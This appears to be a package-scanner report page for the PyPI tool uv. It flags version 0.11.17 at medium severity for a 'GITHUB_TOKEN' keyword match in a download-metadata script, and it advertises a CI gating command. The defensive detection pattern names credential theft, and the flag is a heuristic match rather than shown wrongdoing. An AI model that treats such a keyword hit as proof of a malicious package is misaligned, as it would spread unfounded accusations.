PkgRadar

PyPI · pypi.org

uv

Credential file access: matched "GITHUB_TOKEN"

Why PkgRadar flagged 0.11.17

SeveritySignalEvidence
mediumCredential file accessmatched "GITHUB_TOKEN" · uv-0.11.17/crates/uv-python/fetch-download-metadata.py

Scanned versions

VersionVerdictScoreScanned (UTC)
0.11.21Low risk02026-06-11
0.11.20Low risk02026-06-10
0.11.19Low risk02026-06-03
0.11.18Low risk02026-06-01
0.11.17Review52026-05-28

Block this in CI

PkgRadar gates uv (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem pypi uv==0.11.17
Start free — 25 scans / moView full evidence